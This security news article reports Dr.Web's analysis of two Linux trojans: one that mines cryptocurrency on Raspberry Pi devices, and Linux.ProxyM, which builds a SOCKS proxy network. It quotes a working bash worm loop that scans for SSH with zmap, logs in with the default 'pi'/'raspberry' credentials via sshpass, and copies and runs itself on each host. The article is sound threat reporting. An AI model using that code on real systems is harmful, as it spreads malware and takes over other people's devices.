A new Linux Malware targets Raspberry Pi devices to mine Cryptocurrency

Security researchers at Dr. Web discovered two new Linux Malware, one of them mines for cryptocurrency using Raspberry Pi Devices.

Malware researchers at the Russian antivirus maker Dr.Web have discovered a new Linux trojan, tracked as Kinux.MulDrop.14, that is infecting Raspberry Pi devices with the purpose of mining cryptocurrency.

According to the Russian antivirus maker Dr.Web, the malware was first spotted online in May, the researchers discovered a script containing a compressed and encrypted application.

The Kinux.MulDrop.14 malware targets unsecured Raspberry Pi devices that have SSH ports open to external connections.

Once the Linux malware infects the device, it will first change the password for the “pi” account to:

\$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1

then the malware shuts down several processes and installs libraries like ZMap and sshpass that it uses for its operations.

“Linux Trojan that is a bash script containing a mining program, which is compressed with gzip and encrypted with base64. Once launched, the script shuts down several processes and installs libraries required for its operation. It also installs zmap and sshpass.” states the analysis published by Dr Web.

“It changes the password of the user “pi” to “\$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1””

The malware then starts a cryptocurrency mining process and uses ZMap to scan the Internet for other devices to infect.

Every time the Linux malware finds a Raspberry Pi device on the Internet it uses sshpass to attempt to log in using the default username “pi” and the password “raspberry.”

The malicious code only attempts to use this couple of values, this suggests the malware only targets Raspberry Pi devices. Experts believe the malware could be improved and could be used in the next weeks to targets other platforms.

Below a portion of code shared by Dr.Web

NAME=`mktemp -u 'XXXXXXXX'` 
while [ true ]; do 
FILE=`mktemp` 
zmap -p 22 -o $FILE -n 100000 
killall ssh scp 
for IP in `cat $FILE` 
do 
sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /tmp/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" & 
done 
rm -rf $FILE 
sleep 10 
done

Researchers at Dr. Web also analyzed a second Linux malware Linux.ProxyM that was used to create a proxy network.

The malicious code starts a SOCKS proxy server on infected devices used to relay malicious traffic, disguising his real source.

“The other Trojan was named Linux.ProxyM. attacks involving this Trojan have been noted since February 2017 but peaked in late May. The below chart shows how many Linux.ProxyM attacks Doctor Web specialists have pinpointed:” states Dr. Web.

According to Dr. Web, the number of devices infected with Linux.ProxyM has reached 10,000 units since its discovery in February 2017.

[adrotate banner=”9″]

Pierluigi Paganini

(Security Affairs – Linux Malware, IoT devices)

[adrotate banner=”13″]